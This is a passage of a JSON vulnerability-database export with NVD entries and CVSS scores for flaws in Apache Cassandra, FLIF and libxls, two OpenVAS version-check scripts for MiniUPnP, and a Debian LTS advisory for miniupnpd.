request. This issue is a regression of CVE-2015-0225. The regression was introduced in https://issues.apache.org/jira/browse/CASSANDRA-12109. The fix for the regression is implemented in https://issues.apache.org/jira/browse/CASSANDRA-14173. This fix is contained in the 3.11.2 release of Apache Cassandra.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-28T16:29:00", "title": "CVE-2018-8016", "type": "cve", "cwe": ["CWE-306"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8016"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:apache:cassandra:3.11.1"], "id": "CVE-2018-8016", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-8016", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:apache:cassandra:3.11.1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T13:20:11", "description": "An issue was discovered in Free Lossless Image Format (FLIF) 0.3. The TransformPaletteC<FileIO>::process function in transform/palette_C.hpp allows remote attackers to cause a denial of service (heap-based buffer overflow and application crash) or possibly have unspecified other impact via a crafted PAM image file.", "edition": 4, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-11T13:29:00", "title": "CVE-2018-12109", "type": "cve", "cwe": ["CWE-787"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12109"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/a:flif:flif:0.3"], "id": "CVE-2018-12109", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-12109", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:flif:flif:0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T13:07:33", "description": "An exploitable integer overflow vulnerability exists in the xls_preparseWorkSheet function of libxls 1.4 when handling a MULRK record. A specially crafted XLS file can cause a memory corruption resulting in remote code execution. An attacker can send malicious XLS file to trigger this vulnerability.", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-24T19:29:00", "title": "CVE-2017-12109", "type": "cve", "cwe": ["CWE-190"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12109"], "modified": "2018-05-25T14:32:00", "cpe": ["cpe:/a:libxls_project:libxls:1.4"], "id": "CVE-2017-12109", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12109", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:libxls_project:libxls:1.4:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2020-01-29T19:29:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-12107", "CVE-2017-1000494", "CVE-2019-12110", "CVE-2019-12108", "CVE-2019-12111", "CVE-2019-12109"], "description": "The remote host is missing an update for the ", "modified": "2020-01-29T00:00:00", "published": "2019-06-01T00:00:00", "id": "OPENVAS:1361412562310891811", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891811", "type": "openvas", "title": "Debian LTS: Security Advisory for miniupnpd (DLA-1811-1)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891811\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2017-1000494\", \"CVE-2019-12107\", \"CVE-2019-12108\", \"CVE-2019-12109\", \"CVE-2019-12110\", \"CVE-2019-12111\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-06-01 09:22:39 +0000 (Sat, 01 Jun 2019)\");\n script_name(\"Debian LTS: Security Advisory for miniupnpd (DLA-1811-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2019/05/msg00045.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DLA-1811-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'miniupnpd'\n package(s) announced via the DLA-1811-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Ben Barnea and colleagues from VDOO discovered several vulnerabilities in\nminiupnpd, a small daemon that provides UPnP Internet Gateway Device and\nPort Mapping Protocol services.\nThe issues are basically information leak, null pointer dereferences and\nuses after free.\");\n\n script_tag(name:\"affected\", value:\"'miniupnpd' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n1.8.20140523-4+deb8u1.\n\nWe recommend that you upgrade your miniupnpd packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"miniupnpd\", ver:\"1.8.20140523-4+deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:32:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-12107", "CVE-2019-12110", "CVE-2019-12108", "CVE-2019-12106", "CVE-2019-12111", "CVE-2019-12109"], "description": "MiniUPnP is prone to multiple vulnerabilities.", "modified": "2019-05-22T00:00:00", "published": "2019-05-22T00:00:00", "id": "OPENVAS:1361412562310142455", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310142455", "type": "openvas", "title": "MiniUPnP <= 2.1 Multiple Vulnerabilities", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:miniupnp_project:miniupnpd\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.142455\");\n script_version(\"2019-05-22T09:11:13+0000\");\n script_tag(name:\"last_modification\", value:\"2019-05-22 09:11:13 +0000 (Wed, 22 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-22 09:00:07 +0000 (Wed, 22 May 2019)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_cve_id(\"CVE-2019-12106\", \"CVE-2019-12107\", \"CVE-2019-12108\", \"CVE-2019-12109\", \"CVE-2019-12110\",\n \"CVE-2019-12111\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"MiniUPnP <= 2.1 Multiple Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_miniupnp_detect_tcp.nasl\");\n script_mandatory_keys(\"miniupnp/installed\");\n\n script_tag(name:\"summary\", value:\"MiniUPnP is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"MiniUPnP is prone to multiple vulnerabilities:\n\n - Use after free vulnerability (CVE-2019-12106)\n\n - Information disclosure vulnerability (CVE-2019-12107)\n\n - Multiple DoS vulnerabilities due to NULL pointer dereferences (CVE-2019-12108, CVE-2019-12109, CVE-2019-12110,\n CVE-2019-12111)\");\n\n script_tag(name:\"affected\", value:\"MiniUPnP version 2.1 and prior.\");\n\n script_tag(name:\"solution\", value:\"Apply the provided patches.\");\n\n script_xref(name:\"URL\", value:\"https://www.vdoo.com/blog/security-issues-discovered-in-miniupnp\");\n script_xref(name:\"URL\", value:\"https://github.com/miniupnp/miniupnp/commit/cd506a67e174a45c6a202eff182a712955ed6d6f\");\n script_xref(name:\"URL\", value:\"https://github.com/miniupnp/miniupnp/commit/bec6ccec63cadc95655721bc0e1dd49dac759d94\");\n script_xref(name:\"URL\", value:\"https://github.com/miniupnp/miniupnp/commit/13585f15c7f7dc28bbbba1661efb280d530d114c\");\n script_xref(name:\"URL\", value:\"https://github.com/miniupnp/miniupnp/commit/86030db849260dd8fb2ed975b9890aef1b62b692\");\n script_xref(name:\"URL\", value:\"https://github.com/miniupnp/miniupnp/commit/f321c2066b96d18afa5158dfa2d2873a2957ef38\");\n script_xref(name:\"URL\", value:\"https://github.com/miniupnp/miniupnp/commit/cb8a02af7a5677cf608e86d57ab04241cf34e24f\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!infos = get_app_version_and_proto(cpe: CPE, port: port))\n exit(0);\n\nversion = infos[\"version\"];\nproto = infos[\"proto\"];\n\nif (version_is_less_equal(version: version, test_version: \"2.1\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"Apply Patch\");\n security_message(port: port, data: report, proto: proto);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "debian": [{"lastseen": "2020-08-12T00:58:22", "bulletinFamily": "unix", "cvelist": ["CVE-2019-12107", "CVE-2017-1000494", "CVE-2019-12110", "CVE-2019-12108", "CVE-2019-12111", "CVE-2019-12109"], "description": "Package : miniupnpd\nVersion : 1.8.20140523-4+deb8u1\nCVE ID : CVE-2017-1000494 CVE-2019-12107 CVE-2019-12108\n CVE-2019-12109 CVE-2019-12110 CVE-2019-12111\n\n\nBen Barnea and colleagues from VDOO discovered several vulnerabilities in \nminiupnpd, a small daemon that provides UPnP Internet Gateway Device and \nPort Mapping Protocol services.\nThe issues are basically information leak, null pointer dereferences and \nuses after free.\n\n\n\nFor Debian 8 &quot;Jessie&quot;, these problems have been fixed in version\n1.8.20140523-4+deb8u1.\n\nWe recommend that you upgrade your miniupnpd packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n\n", "edition": 7, "modified": "2019-05-30T17:20:29", "published": "2019-05-30T17:20:29", "id": "DEBIAN:DLA-1811-1:B8BB8", "href": "https://lists.debian.org/debian-lts-announce/2019/debian-lts-announce-201905/msg00045.html", "title": "[SECURITY] [DLA 1811-1] miniupnpd security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}